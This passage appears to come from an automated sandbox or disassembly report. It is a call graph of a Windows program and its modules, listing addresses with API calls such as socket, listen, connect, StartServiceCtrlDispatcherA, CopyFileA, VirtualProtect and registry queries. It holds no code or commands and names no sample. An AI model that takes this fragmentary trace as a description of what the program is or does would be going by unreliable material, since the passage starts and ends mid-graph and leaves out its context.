58797->58799 58800 7ff8bfab653f 58798->58800 58799->58801 58800->58800 58802 7ff8bfab6546 LeaveCriticalSection 58800->58802 58801->58784 58801->58789 58801->58790 58801->58793 58801->58795 58804 7ff8bfab65d1 GetProcessHeap HeapFree 58801->58804 58805 7ff8bfab15fa socket 58801->58805 58823 7ff8bfab13f9 58801->58823 58829 7ff8bfab1344 setsockopt 58801->58829 58836 7ff8bfab19d9 58801->58836 58859 7ff8bfab152a setsockopt 58801->58859 58803 7ff8bfaba202 6 API calls 58802->58803 58803->58801 58804->58801 58806 7ff8bfab1702 WSAGetLastError 58805->58806 58807 7ff8bfab162b 58805->58807 58808 7ff8bfaba202 6 API calls 58806->58808 58809 7ff8bfab152a 8 API calls 58807->58809 58810 7ff8bfab1726 58808->58810 58811 7ff8bfab1638 58809->58811 58812 7ff8bfab16f9 58810->58812 58816 7ff8bfaba202 6 API calls 58810->58816 58813 7ff8bfab16f1 58811->58813 58814 7ff8bfab1641 htonl htons bind 58811->58814 58812->58801 58815 7ff8bfab14c5 10 API calls 58813->58815 58817 7ff8bfab1681 listen 58814->58817 58818 7ff8bfab16c4 WSAGetLastError 58814->58818 58815->58812 58816->58812 58817->58810 58820 7ff8bfab169a WSAGetLastError 58817->58820 58819 7ff8bfaba202 6 API calls 58818->58819 58821 7ff8bfab16c2 58819->58821 58822 7ff8bfaba202 6 API calls 58820->58822 58821->58810 58821->58813 58822->58821 58824 7ff8bfab1409 ioctlsocket 58823->58824 58826 7ff8bfab142c 58824->58826 58827 7ff8bfab143d WSAGetLastError 58824->58827 58826->58801 58828 7ff8bfaba202 6 API calls 58827->58828 58828->58826 58830 7ff8bfab13d4 WSAGetLastError 58829->58830 58831 7ff8bfab1379 setsockopt 58829->58831 58834 7ff8bfaba202 6 API calls 58830->58834 58832 7ff8bfab13a5 58831->58832 58833 7ff8bfab13af WSAGetLastError 58831->58833 58832->58801 58835 7ff8bfaba202 6 API calls 58833->58835 58834->58832 58835->58832 58837 7ff8bfab1a04 58836->58837 58838 7ff8bfab1a98 accept 58836->58838 58841 7ff8bfab13f9 8 API calls 58837->58841 58839 7ff8bfab1bda WSAGetLastError 58838->58839 58840 7ff8bfab1abe 58838->58840 58842 7ff8bfaba202 6 API calls 58839->58842 58843 7ff8bfab13f9 8 API calls 58840->58843 58844 7ff8bfab1a0e 58841->58844 58855 7ff8bfab1a13 58842->58855 58846 7ff8bfab1acb 58843->58846 58845 7ff8bfab1a2e select 58844->58845 58844->58855 58847 7ff8bfab1a92 58845->58847 58848 7ff8bfab1b69 58845->58848 58849 7ff8bfab1bc6 58846->58849 58850 7ff8bfab1ad4 htonl htons 58846->58850 58847->58838 58851 7ff8bfab1b93 WSAGetLastError 58847->58851 58853 7ff8bfaba202 6 API calls 58848->58853 58852 7ff8bfab14c5 10 API calls 58849->58852 58857 7ff8bfab1af7 58850->58857 58856 7ff8bfaba202 6 API calls 58851->58856 58852->58855 58853->58855 58855->58801 58856->58855 58858 7ff8bfaba202 6 API calls 58857->58858 58858->58855 58860 7ff8bfab1571 WSAGetLastError 58859->58860 58861 7ff8bfab1567 58859->58861 58862 7ff8bfaba202 6 API calls 58860->58862 58861->58801 58862->58861 58864 7ff8bfab14d9 58863->58864 58871 7ff8bfab14d3 58863->58871 58872 7ff8bfab1462 shutdown 58864->58872 58867 7ff8bfab14f1 58869 7ff8bfaba202 6 API calls 58867->58869 58868 7ff8bfab1509 WSAGetLastError 58870 7ff8bfaba202 6 API calls 58868->58870 58869->58871 58870->58871 58871->58785 58873 7ff8bfab147b 58872->58873 58874 7ff8bfab1499 WSAGetLastError 58872->58874 58875 7ff8bfaba202 6 API calls 58873->58875 58876 7ff8bfab1491 closesocket 58874->58876 58877 7ff8bfab14a6 58874->58877 58875->58876 58876->58867 58876->58868 58878 7ff8bfaba202 6 API calls 58877->58878 58878->58876 58879 7ff8ba50184a 58887 7ff8ba501855 58879->58887 58880 7ff8ba50195e 58881 7ff8ba50196b 58880->58881 58946 7ff8ba5022d5 10 API calls 58880->58946 58884 7ff8ba50187d Sleep 58884->58887 58886 7ff8ba5022d5 10 API calls 58886->58887 58887->58880 58887->58884 58887->58886 58888 7ff8ba501932 Sleep 58887->58888 58890 7ff8ba50191e memcpy 58887->58890 58891 7ff8ba50256c socket 58887->58891 58926 7ff8ba502a1a 58887->58926 58937 7ff8ba501780 58887->58937 58888->58887 58890->58887 58892 7ff8ba5025a3 58891->58892 58893 7ff8ba50276b WSAGetLastError 58891->58893 58894 7ff8ba5025a7 58892->58894 58895 7ff8ba5025c5 58892->58895 58896 7ff8ba501292 6 API calls 58893->58896 58947 7ff8ba502209 58894->58947 58899 7ff8ba502209 8 API calls 58895->58899 58898 7ff8ba50278f 58896->58898 58901 7ff8ba5025df 58898->58901 58902 7ff8ba502799 58898->58902 58903 7ff8ba5025c3 58899->58903 58904 7ff8ba501292 6 API calls 58901->58904 58964 7ff8ba501292 58902->58964 58907 7ff8ba5025d7 58903->58907 58960 7ff8ba50233a setsockopt 58903->58960 58908 7ff8ba502600 58904->58908 58905 7ff8ba50261e 58905->58907 58910 7ff8ba502623 htonl htons connect 58905->58910 58975 7ff8ba5022d5 10 API calls 58907->58975 58908->58887 58913 7ff8ba502661 58910->58913 58914 7ff8ba50267c WSAGetLastError 58910->58914 58915 7ff8ba502209 8 API calls 58913->58915 58916 7ff8ba50273e WSAGetLastError 58914->58916 58917 7ff8ba50268d 58914->58917 58919 7ff8ba50266e 58915->58919 58918 7ff8ba501292 6 API calls 58916->58918 58917->58907 58920 7ff8ba502695 select 58917->58920 58918->58907 58919->58898 58919->58907 58921 7ff8ba5026f6 58920->58921 58922 7ff8ba502720 58920->58922 58921->58913 58924 7ff8ba5026fc WSAGetLastError 58921->58924 58923 7ff8ba501292 6 API calls 58922->58923 58923->58907 58925 7ff8ba501292 6 API calls 58924->58925 58925->58907 58927 7ff8ba502a34 58926->58927 58928 7ff8ba502aa8 58926->58928 58927->58928 58929 7ff8ba502a39 recv 58927->58929 58930 7ff8ba501292 6 API calls 58928->58930 58931 7ff8ba502a4f 58929->58931 58932 7ff8ba502a5c WSAGetLastError 58929->58932 58933 7ff8ba502a53 58930->58933 58931->58933 58936 7ff8ba501292 6 API calls 58931->58936 58932->58933 58934 7ff8ba502a70 58932->58934 58933->58887 58935 7ff8ba501292 6 API calls 58934->58935 58935->58933 58936->58933 58938 7ff8ba501842 58937->58938 58939 7ff8ba501798 58937->58939 58938->58887 58939->58938 58984 7ff8ba509540 58939->58984 58942 7ff8ba501834 LeaveCriticalSection 58942->58938 58943 7ff8ba5017c8 58943->58942 58944 7ff8ba501292 6 API calls 58943->58944 58987 7ff8ba50a8a0 58943->58987 58944->58943 58946->58881 58948 7ff8ba502219 ioctlsocket 58947->58948 58950 7ff8ba50224d WSAGetLastError 58948->58950 58951 7ff8ba50223c 58948->58951 58952 7ff8ba501292 6 API calls 58950->58952 58951->58905 58953 7ff8ba502154 setsockopt 58951->58953 58952->58951 58954 7ff8ba5021e4 WSAGetLastError 58953->58954 58955 7ff8ba502189 setsockopt 58953->58955 58956 7ff8ba501292 6 API calls 58954->58956 58957 7ff8ba5021b5 58955->58957 58958 7ff8ba5021bf WSAGetLastError 58955->58958 58956->58957 58957->58903 58959 7ff8ba501292 6 API calls 58958->58959 58959->58957 58961 7ff8ba502377 58960->58961 58962 7ff8ba502381 WSAGetLastError 58960->58962 58961->58905 58963 7ff8ba501292 6 API calls 58962->58963 58963->58961 58965 7ff8ba5012a0 58964->58965 58976 7ff8ba50d670 58965->58976 58968 7ff8ba501350 58968->58908 58969 7ff8ba501327 fwrite fflush 58969->58968 58970 7ff8ba50135c EnterCriticalSection 58971 7ff8ba501376 LeaveCriticalSection 58970->58971 58972 7ff8ba501393 58970->58972 58971->58969 58973 7ff8ba5013cd CopyFileA 58972->58973 58974 7ff8ba501405 58973->58974 58974->58971 58975->58901 58977 7ff8ba50d67e 58976->58977 58978 7ff8ba50d695 58976->58978 58982 7ff8ba50e6ab fputc 58977->58982 58983 7ff8ba50e6ab fputc 58978->58983 58981 7ff8ba5012f9 58981->58968 58981->58969 58981->58970 58982->58981 58983->58981 58985 7ff8ba5017ab EnterCriticalSection 58984->58985 58986 7ff8ba509556 GetSystemTimeAsFileTime 58984->58986 58985->58943 58986->58985 58988 7ff8ba50a8cc 58987->58988 58989 7ff8ba50a8eb 58987->58989 58990 7ff8ba50a909 58988->58990 58991 7ff8ba50a8d6 58988->58991 58989->58943 59006 7ff8ba50a50f 23 API calls 58990->59006 58993 7ff8ba50a8d8 58991->58993 58994 7ff8ba50a8f4 58991->58994 58995 7ff8ba50a8df 58993->58995 58996 7ff8ba50a902 58993->58996 58994->58989 59001 7ff8ba50a2a2 58994->59001 58995->58989 59004 7ff8ba50a639 45 API calls 58995->59004 59005 7ff8ba50a2b0 25 API calls 58996->59005 58999 7ff8ba50a907 58999->58989 59007 7ff8ba50a060 59001->59007 59004->58989 59005->58999 59006->58989 59036 7ff8ba502eab 59007->59036 59014 7ff8ba50a0f2 strlen 59015 7ff8ba50a109 59014->59015 59016 7ff8ba50a11f strlen 59014->59016 59015->59016 59018 7ff8ba50a10e strlen 59015->59018 59056 7ff8ba5066c9 59016->59056 59018->59016 59020 7ff8ba50a26b 59112 7ff8ba503ff8 FindClose 59020->59112 59021 7ff8ba50a151 59023 7ff8ba50a159 strlen 59021->59023 59030 7ff8ba50a087 59021->59030 59026 7ff8ba50a170 59023->59026 59027 7ff8ba50a186 strcpy strlen strlen strlen 59023->59027 59026->59027 59029 7ff8ba50a175 strlen 59026->59029 59033 7ff8ba50a1e9 59027->59033 59028 7ff8ba50a277 59028->59030 59031 7ff8ba502eab 2 API calls 59028->59031 59029->59027 59030->58989 59031->59030 59033->59020 59033->59030 59084 7ff8ba504013 59033->59084 59109 7ff8ba50afb7 38 API calls 59033->59109 59110 7ff8ba50a9e0 21 API calls 59033->59110 59111 7ff8ba50ab69 66 API calls 59033->59111 59037 7ff8ba502eb6 59036->59037 59038 7ff8ba502ec1 QueryPerformanceFrequency QueryPerformanceCounter 59036->59038 59037->59030 59039 7ff8ba509cc0 GetModuleHandleExA 59037->59039 59038->59037 59040 7ff8ba509ce8 59039->59040 59041 7ff8ba509cf2 GetLastError 59039->59041 59043 7ff8ba506dd1 59040->59043 59042 7ff8ba501292 6 API calls 59041->59042 59042->59040 59044 7ff8ba506de2 59043->59044 59045 7ff8ba506e18 59043->59045 59046 7ff8ba506de7 59044->59046 59047 7ff8ba506e48 59044->59047 59048 7ff8ba501292 6 API calls 59045->59048 59049 7ff8ba506df0 59046->59049 59050 7ff8ba506e78 59046->59050 59051 7ff8ba501292 6 API calls 59047->59051 59054 7ff8ba506dfd 59048->59054 59113 7ff8ba506c92 8 API calls 59049->59113 59052 7ff8ba501292 6 API calls 59050->59052 59051->59054 59052->59054 59054->59014 59054->59033 59055 7ff8ba506df5 59055->59054 59057 7ff8ba5066e7 59056->59057 59058 7ff8ba5066d2 GetFileAttributesA 59056->59058 59059 7ff8ba501292 6 API calls 59057->59059 59060 7ff8ba506717 GetLastError 59058->59060 59061 7ff8ba5066dd 59058->59061 59059->59061 59060->59061 59061->59021 59062 7ff8ba5042be 59061->59062 59063 7ff8ba5042dd strlen 59062->59063 59064 7ff8ba504318 59062->59064 59065 7ff8ba5042ee 59063->59065 59077 7ff8ba504309 59063->59077 59066 7ff8ba501292 6 API calls 59064->59066 59067 7ff8ba5042f7 CreateDirectoryA 59065->59067 59068 7ff8ba504396 strcpy strlen 59065->59068 59066->59077 59070 7ff8ba504350 GetLastError 59067->59070 59067->59077 59069 7ff8ba5043ce strlen 59068->59069 59076 7ff8ba504375 59068->59076 59069->59076 59074 7ff8ba501292 6 API calls 59070->59074 59071 7ff8ba5043bd strlen 59071->59069 59072 7ff8ba504580 59075 7ff8ba501292 6 API calls 59072->59075 59073 7ff8ba504509 59079 7ff8ba501292 6 API calls 59073->59079 59074->59076 59078 7ff8ba504532 59075->59078 59076->59068 59076->59069 59076->59071 59076->59077 59080 7ff8ba50443a CreateDirectoryA 59076->59080 59077->59072 59077->59073 59078->59021 59079->59078 59081 7ff8ba504451 GetLastError 59080->59081 59082 7ff8ba5043e5 59080->59082 59081->59082 59082->59076 59083 7ff8ba501292 6 API calls 59082->59083 59083->59082 59085 7ff8ba504033 59084->59085 59086 7ff8ba504079 59084->59086 59088 7ff8ba5040d2 59085->59088 59089 7ff8ba50403c 59085->59089 59087 7ff8ba501292 6 API calls 59086->59087 59108 7ff8ba5040c3 59086->59108 59087->59108 59090 7ff8ba501292 6 API calls 59088->59090 59091 7ff8ba504045 59089->59091 59092 7ff8ba50410a 59089->59092 59090->59108 59094 7ff8ba504142 FindFirstFileA 59091->59094 59095 7ff8ba504051 FindNextFileA 59091->59095 59093 7ff8ba501292 6 API calls 59092->59093 59093->59108 59096 7ff8ba504156 59094->59096 59097 7ff8ba504163 GetLastError 59094->59097 59098 7ff8ba504067 59095->59098 59099 7ff8ba504192 GetLastError 59095->59099 59100 7ff8ba50406c strcpy 59096->59100 59101 7ff8ba504177 59097->59101 59102 7ff8ba504170 59097->59102 59098->59100 59099->59102 59103 7ff8ba5041bb 59099->59103 59100->59086 59104 7ff8ba501292 6 API calls 59101->59104 59102->59086 59105 7ff8ba5041ad FindClose 59102->59105 59107 7ff8ba5041d8 59102->59107 59106 7ff8ba501292 6 API calls 59103->59106 59104->59102 59105->59086 59106->59102 59107->59033 59108->59033 59109->59033 59110->59033 59111->59033 59112->59028 59113->59055 59114 7ff7088712fd 59117 7ff708871131 59114->59117 59118 7ff70887115a 59117->59118 59119 7ff708871172 59118->59119 59120 7ff708871169 Sleep 59118->59120 59121 7ff708871188 _amsg_exit 59119->59121 59122 7ff708871194 59119->59122 59120->59118 59123 7ff7088711b5 59121->59123 59122->59123 59124 7ff70887119a _initterm 59122->59124 59125 7ff7088711de 59123->59125 59126 7ff7088711c5 _initterm 59123->59126 59124->59123 59138 7ff70887a27a 59125->59138 59126->59125 59129 7ff70887122e 59130 7ff708871233 malloc 59129->59130 59131 7ff708871253 59130->59131 59132 7ff708871258 strlen malloc 59131->59132 59133 7ff708871283 59131->59133 59132->59131 59151 7ff708878e30 59133->59151 59135 7ff7088712c4 59136 7ff7088712e8 59135->59136 59137 7ff7088712e3 _cexit 59135->59137 59137->59136 59139 7ff708871208 SetUnhandledExceptionFilter 59138->59139 59141 7ff70887a298 59138->59141 59139->59129 59140 7ff70887a494 59140->59139 59143 7ff70887a4bc VirtualProtect 59140->59143 59141->59140 59142 7ff70887a315 59141->59142 59147 7ff70887a34a 59141->59147 59142->59140 59145 7ff70887a329 59142->59145 59143->59140 59145->59142 59155 7ff70887a134 6 API calls 59145->59155 59147->59140 59148 7ff70887a36d 59147->59148 59156 7ff70887a134 6 API calls 59148->59156 59157 7ff70887a0d0 VirtualQuery VirtualProtect GetLastError 59148->59157 59158 7ff70887a0d0 VirtualQuery VirtualProtect GetLastError 59148->59158 59152 7ff708878e40 59151->59152 59159 7ff708878c4a 59152->59159 59155->59145 59156->59147 59157->59147 59158->59147 59160 7ff708878c54 strcmp 59159->59160 59162 7ff708878cce 59160->59162 59163 7ff708878c6b strcmp 59160->59163 59180 7ff70887849a 59162->59180 59164 7ff708878e08 59163->59164 59165 7ff708878c82 StartServiceCtrlDispatcherA 59163->59165 59167 7ff7088799e2 6 API calls 59164->59167 59168 7ff708878d26 GetLastError 59165->59168 59177 7ff708878cbb 59165->59177 59167->59177 59246 7ff7088799e2 59168->59246 59171 7ff708878cd9 59199 7ff7088788ee 10 API calls 59171->59199 59174 7ff708878ced 59174->59171 59178 7ff708878cf7 _read 59174->59178 59237 7ff70887886d 59174->59237 59175 7ff708878cde 59200 7ff7088789aa 13 API calls 59175->59200 59177->59135 59178->59171 59178->59174 59257 7ff708871360 GetModuleHandleExA 59180->59257 59190 7ff7088784cc 59191 7ff7088784d0 59190->59191 59319 7ff7088793f0 59190->59319 59191->59171 59201 7ff708878563 59191->59201 59194 7ff708871360 8 API calls 59195 7ff708878530 59194->59195 59196 7ff708874bc4 12 API calls 59195->59196 59197 7ff708878549 59196->59197 59197->59191 59371 7ff708876242 59197->59371 59199->59175 59200->59177 59202 7ff708871360 8 API calls 59201->59202 59203 7ff7088785ae 59202->59203 59204 7ff708874ab1 8 API calls 59203->59204 59205 7ff7088785c3 59204->59205 59206 7ff7088785cd strlen 59205->59206 59218 7ff7088787cd 59205->59218 59207 7ff7088785ea 59206->59207 59208 7ff708878603 _mbscpy strlen strlen 59206->59208 59207->59208 59210 7ff7088785ef strlen 59207->59210 59220 7ff70887864a 59208->59220 59209 7ff708878805 59209->59174 59210->59208 59211 7ff7088787c3 59777 7ff708871cd8 FindClose 59211->59777 59213 7ff708871cf3 12 API calls 59213->59220 59214 7ff7088787e4 59217 7ff7088799e2 6 API calls 59214->59217 59215 7ff708871694 8 API calls 59215->59220 59216 7ff7088799e2 6 API calls 59216->59218 59217->59209 59218->59209 59218->59214 59218->59216 59690 7ff8ba50a930 59218->59690 59703 7ff8b9188440 59218->59703 59720 7ff8bfb534b0 59218->59720 59733 7ff8b915bdc0 59218->59733 59748 7ff8bfaba6e0 59218->59748 59759 7ff8bfb84510 59218->59759 59778 7ff7088781e0 SetServiceStatus 59218->59778 59220->59211 59220->59213 59220->59215 59221 7ff708878715 59220->59221 59222 7ff70887866e FreeLibrary 59220->59222 59224 7ff708871613 8 API calls 59220->59224 59689 7ff7088781e0 SetServiceStatus 59220->59689 59223 7ff7088799e2 6 API calls 59221->59223 59222->59220 59225 7ff70887872d GetProcessHeap HeapAlloc 59223->59225 59224->59220 59227 7ff708878776 59225->59227 59228 7ff70887874f _mbscpy 59225->59228 59229 7ff7088799e2 6 API calls 59227->59229 59228->59227 59230 7ff70887879b 59228->59230 59229->59230 59230->59211 59230->59230 59238 7ff708871360 8 API calls 59237->59238 59239 7ff70887889c 59238->59239 59240 7ff708874ab1 8 API calls 59239->59240 59241 7ff7088788ae 59240->59241 59242 7ff70887824d 20 API calls 59241->59242 59244 7ff7088788b4 59241->59244 59243 7ff7088788ca 59242->59243 59243->59244 59245 7ff7088788d7 SleepEx 59243->59245 59244->59174 59245->59244 59247 7ff7088799f0 59246->59247 61202 7ff70887ab10 59247->61202 59250 7ff708879aac EnterCriticalSection 59253 7ff708879ac6 LeaveCriticalSection 59250->59253 59254 7ff708879ae3 59250->59254 59251 7ff708879a77 fwrite fflush 59252 7ff708879aa0 59251->59252 59252->59177 59253->59251 59255 7ff708879b1d CopyFileA 59254->59255 59256 7ff708879b55 59255->59256 59256->59253 59258 7ff708871388 59257->59258 59259 7ff708871392 GetLastError 59257->59259 59261 7ff708874bc4 59258->59261 59260 7ff7088799e2 6 API calls 59259->59260 59260->59258 59262 7ff708874c0a 59261->59262 59263 7ff708874bda 59261->59263 59264 7ff7088799e2 6 API calls 59262->59264 59394 7ff708874ab1 59263->59394 59270 7ff708874beb 59264->59270 59267 7ff708874c3a strlen 59268 7ff708874c4c 59267->59268 59269 7ff708874c62 _mbscat strlen 59267->59269 59268->59269 59271 7ff708874c51 strlen 59268->59271 59269->59270 59270->59190 59272 7ff708873d81 59270->59272 59271->59269 59273 7ff708873d98 59272->59273 59274 7ff708873e84 59272->59274 59276 7ff708873eb4 59273->59276 59277 7ff708873da1 CreateFileA 59273->59277 59275 7ff7088799e2 6 API calls 59274->59275 59280 7ff708873e39 59275->59280 59281 7ff7088799e2 6 API calls 59276->59281 59278 7ff708873dec LockFileEx 59277->59278 59279 7ff708873ee7 GetLastError 59277->59279 59283 7ff708873fcc GetLastError 59278->59283 59284 7ff708873e20 59278->59284 59282 7ff7088799e2 6 API calls 59279->59282 59288 7ff70887414b 59280->59288 59289 7ff708873e63 59280->59289 59281->59280 59285 7ff708873f08 59282->59285 59287 7ff7088799e2 6 API calls 59283->59287 59284->59280 59286 7ff70887413d CloseHandle 59284->59286 59285->59283 59291 7ff70887403e 59285->59291 59286->59288 59290 7ff708873fed 59287->59290 59293 7ff7088799e2 6 API calls 59288->59293 59292 7ff7088799e2 6 API calls 59289->59292 59290->59291 59291->59286 59291->59290 59294 7ff708873e79 59292->59294 59293->59294 59294->59191 59295 7ff708879b8c InitializeCriticalSectionAndSpinCount 59294->59295 59296 7ff708879cdd GetLastError 59295->59296 59297 7ff708879bba 59295->59297 59299 7ff7088799e2 6 API calls 59296->59299 59298 7ff708871360 8 API calls 59297->59298 59300 7ff708879bd6 59298->59300 59309 7ff708879cb6 59299->59309 59301 7ff708874ab1 8 API calls 59300->59301 59302 7ff708879bea 59301->59302 59303 7ff708879bf4 strlen 59302->59303 59302->59309 59305 7ff708879c0d 59303->59305 59306 7ff708879c23 59303->59306 59304 7ff7088799e2 6 API calls 59310 7ff708879cd3 59304->59310 59305->59306 59311 7ff708879c12 strlen 59305->59311 59307 7ff708879c48 strlen fopen 59306->59307 59308 7ff708879c28 _mbscat strlen 59306->59308 59312 7ff708879daa 59307->59312 59313 7ff708879c94 59307->59313 59308->59307 59309->59304 59310->59190 59311->59306 59315 7ff7088799e2 6 API calls 59312->59315 59314 7ff7088799e2 6 API calls 59313->59314 59316 7ff708879cae 59314->59316 59315->59309 59316->59309 59317 7ff708879e1a 59316->59317 59318 7ff7088799e2 6 API calls 59317->59318 59318->59310 59408 7ff708871694 59319->59408 59323 7ff708879457 FreeLibrary 59326 7ff7088794b7 GetNativeSystemInfo GetWindowsDirectoryA 59323->59326 59345 7ff70887948d 59323->59345 59325 7ff7088799e2 6 API calls 59349 7ff7088784fe 59325->59349 59328 7ff7088795ce 59326->59328 59329 7ff7088794f6 GetLastError 59326->59329 59331 7ff7088799e2 6 API calls 59328->59331 59330 7ff7088799e2 6 API calls 59329->59330 59330->59345 59333 7ff7088795ef 59331->59333 59332 7ff7088799e2 6 API calls 59332->59323 59333->59345 59424 7ff708875602 59333->59424 59335 7ff7088799e2 6 API calls 59342 7ff70887962b 59335->59342 59336 7ff70887963b GetVolumeInformationA 59342->59335 59342->59336 59342->59345 59345->59325 59349->59191 59354 7ff70887836f 59349->59354 59355 7ff708871360 8 API calls 59354->59355 59356 7ff7088783b4 59355->59356 59357 7ff708874ab1 8 API calls 59356->59357 59358 7ff7088783c6 59357->59358 59359 7ff7088783cc _mbscpy 59358->59359 59360 7ff7088783f6 59358->59360 59451 7ff70887824d strlen 59359->59451 59362 7ff7088799e2 6 API calls 59360->59362 59365 7ff708878421 59362->59365 59364 7ff7088783f2 59364->59360 59365->59191 59365->59194 59372 7ff70887626a 59371->59372 59373 7ff7088762f5 59371->59373 59395 7ff708874af8 59394->59395 59396 7ff708874ac2 59394->59396 59397 7ff7088799e2 6 API calls 59395->59397 59398 7ff708874ac7 59396->59398 59399 7ff708874b28 59396->59399 59405 7ff708874add 59397->59405 59401 7ff708874b58 59398->59401 59402 7ff708874ad0 59398->59402 59400 7ff7088799e2 6 API calls 59399->59400 59400->59405 59403 7ff7088799e2 6 API calls 59401->59403 59407 7ff708874972 8 API calls 59402->59407 59403->59405 59405->59267 59405->59270 59406 7ff708874ad5 59406->59405 59407->59406 59409 7ff7088716cb 59408->59409 59410 7ff7088716a2 LoadLibraryA 59408->59410 59411 7ff7088716ce GetLastError 59409->59411 59410->59411 59412 7ff7088716b0 59410->59412 59413 7ff7088799e2 6 API calls 59411->59413 59414 7ff7088799e2 6 API calls 59412->59414 59415 7ff7088716c9 59413->59415 59414->59415 59415->59345 59416 7ff708871613 59415->59416 59417 7ff708871661 59416->59417 59418 7ff708871630 GetProcAddress 59416->59418 59419 7ff708871666 GetLastError 59417->59419 59418->59419 59420 7ff708871641 59418->59420 59422 7ff7088799e2 6 API calls 59419->59422 59421 7ff7088799e2 6 API calls 59420->59421 59423 7ff70887165f 59421->59423 59422->59423 59423->59323 59423->59332 59425 7ff70887562b 59424->59425 59440 7ff70887568a 59424->59440 59427 7ff7088756ed 59425->59427 59428 7ff708875634 59425->59428 59426 7ff7088799e2 6 API calls 59444 7ff7088756e3 59426->59444 59429 7ff7088799e2 6 API calls 59427->59429 59430 7ff70887563d 59428->59430 59431 7ff708875720 59428->59431 59429->59444 59433 7ff708875646 RegOpenKeyExA 59430->59433 59434 7ff708875753 59430->59434 59432 7ff7088799e2 6 API calls 59431->59432 59432->59444 59435 7ff70887566d 59433->59435 59436 7ff708875786 RegQueryValueExA 59433->59436 59437 7ff7088799e2 6 API calls 59434->59437 59439 7ff7088799e2 6 API calls 59435->59439 59449 7ff7088757b4 59436->59449 59450 7ff708875807 RegCloseKey 59436->59450 59437->59444 59438 7ff708875a89 59443 7ff7088799e2 6 API calls 59438->59443 59439->59440 59440->59426 59440->59444 59441 7ff708875aac 59446 7ff708875929 59443->59446 59444->59438 59445 7ff7088758e6 59444->59445 59445->59441 59447 7ff7088799e2 6 API calls 59445->59447 59446->59342 59447->59446 59448 7ff7088799e2 6 API calls 59448->59449 59449->59448 59449->59450 59450->59444 59452 7ff70887827d strlen 59451->59452 59453 7ff708878267 59451->59453 59504 7ff7088743a9 59452->59504 59453->59452 59454 7ff70887826c strlen 59453->59454 59454->59452 59456 7ff7088782b6 59456->59364 59464 7ff7088779c0 59456->59464 59457 7ff7088782a5 59457->59456 59459 7ff708878307 strlen 59457->59459 59460 7ff708878348 59457->59460 59463 7ff708878334 strlen 59457->59463 59510 7ff708871cf3 59457->59510 59461 7ff7088743a9 8 API calls 59459->59461 59534 7ff708871cd8 FindClose 59460->59534 59461->59457 59463->59457 59465 7ff708877a62 59464->59465 59466 7ff7088779e2 59464->59466 59505 7ff7088743c7 59504->59505 59506 7ff7088743b2 GetFileAttributesA 59504->59506 59508 7ff7088799e2 6 API calls 59505->59508 59507 7ff7088743f7 GetLastError 59506->59507 59509 7ff7088743bd 59506->59509 59507->59509 59508->59509 59509->59457 59511 7ff708871d59 59510->59511 59512 7ff708871d13 59510->59512 59534->59456 59689->59220 59779 7ff8ba50143c InitializeCriticalSectionAndSpinCount 59690->59779 59693 7ff8ba50a946 59694 7ff8ba50a94a 59693->59694 59848 7ff8ba502dde WSAStartup 59693->59848 59694->59218 59969 7ff8b918143c InitializeCriticalSectionAndSpinCount 59703->59969 59706 7ff8b9188456 59719 7ff8b918845a 59706->59719 60038 7ff8b91849bf InitializeCriticalSectionAndSpinCount 59706->60038 59719->59218 60216 7ff8bfb5317c InitializeCriticalSectionAndSpinCount 59720->60216 59723 7ff8bfb534c6 59724 7ff8bfb534ca 59723->59724 60285 7ff8bfb52f1e WSAStartup 59723->60285 59724->59218 59729 7ff8bfb53511 59729->59724 60293 7ff8bfb53b21 InitializeCriticalSectionAndSpinCount 59729->60293 60443 7ff8b915143c InitializeCriticalSectionAndSpinCount 59733->60443 59736 7ff8b915bdd6 59747 7ff8b915bdda 59736->59747 60512 7ff8b9152dde WSAStartup 59736->60512 59747->59218 60678 7ff8bfaba3ac InitializeCriticalSectionAndSpinCount 59748->60678 59755 7ff8bfaba6f6 59758 7ff8bfaba6fa 59755->59758 60747 7ff8bfab1fce WSAStartup 59755->60747 59756 7ff8bfaba741 59756->59758 60755 7ff8bfab6941 InitializeCriticalSectionAndSpinCount 59756->60755 59758->59218 60889 7ff8bfb8143c InitializeCriticalSectionAndSpinCount 59759->60889 59762 7ff8bfb84529 59764 7ff8bfb8452d 59762->59764 60956 7ff8bfb824ae WSAStartup 59762->60956 59767 7ff8bfb81292 19 API calls 59764->59767 59776 7ff8bfb8454a 59767->59776 59768 7ff8bfb8459b 59768->59764 60964 7ff8bfb89fe1 InitializeCriticalSectionAndSpinCount 59768->60964 59776->59218 59777->59218 59778->59218 59780 7ff8ba501590 GetLastError 59779->59780 59781 7ff8ba50146a 59779->59781 59783 7ff8ba501292 6 API calls 59780->59783 59782 7ff8ba509cc0 8 API calls 59781->59782 59784 7ff8ba501486 59782->59784 59794 7ff8ba501569 59783->59794 59785 7ff8ba506dd1 8 API calls 59784->59785 59786 7ff8ba50149a 59785->59786 59787 7ff8ba5014a4 strlen 59786->59787 59786->59794 59788 7ff8ba5014d3 59787->59788 59789 7ff8ba5014bd 59787->59789 59792 7ff8ba5014f8 strlen fopen 59788->59792 59793 7ff8ba5014d8 strcat strlen 59788->59793 59789->59788 59791 7ff8ba5014c2 strlen 59789->59791 59790 7ff8ba501292 6 API calls 59795 7ff8ba501586 59790->59795 59791->59788 59796 7ff8ba501547 59792->59796 59797 7ff8ba50165d 59792->59797 59793->59792 59794->59790 59795->59693 59803 7ff8ba507ab4 59795->59803 59799 7ff8ba501292 6 API calls 59796->59799 59798 7ff8ba501292 6 API calls 59797->59798 59798->59794 59800 7ff8ba501561 59799->59800 59800->59794 59801 7ff8ba5016cd 59800->59801 59802 7ff8ba501292 6 API calls 59801->59802 59802->59795 59804 7ff8ba507ad6 59803->59804 59805 7ff8ba507b19 59803->59805 59884 7ff8ba507720 59804->59884 59806 7ff8ba501292 6 API calls 59805->59806 59808 7ff8ba507aef 59806->59808 59808->59694 59813 7ff8ba503420 59808->59813 59810 7ff8ba507b49 _errno _strtoui64 _errno 59810->59808 59811 7ff8ba507b7c _errno 59810->59811 59812 7ff8ba501292 6 API calls 59811->59812 59812->59808 59926 7ff8ba509ff4 59813->59926 59849 7ff8ba502e22 59848->59849 59850 7ff8ba502dfa 59848->59850 59852 7ff8ba501292 6 API calls 59849->59852 59851 7ff8ba501292 6 API calls 59850->59851 59853 7ff8ba502e14 59851->59853 59854 7ff8ba502e3b 59852->59854 59853->59694 59856 7ff8ba501d21 InitializeCriticalSectionAndSpinCount 59853->59856 59855 7ff8ba501292 6 API calls 59854->59855 59855->59853 59857 7ff8ba501d46 CreateThread 59856->59857 59858 7ff8ba501dc4 GetLastError 59856->59858 59859 7ff8ba501e9c GetLastError 59857->59859 59867 7ff8ba501d92 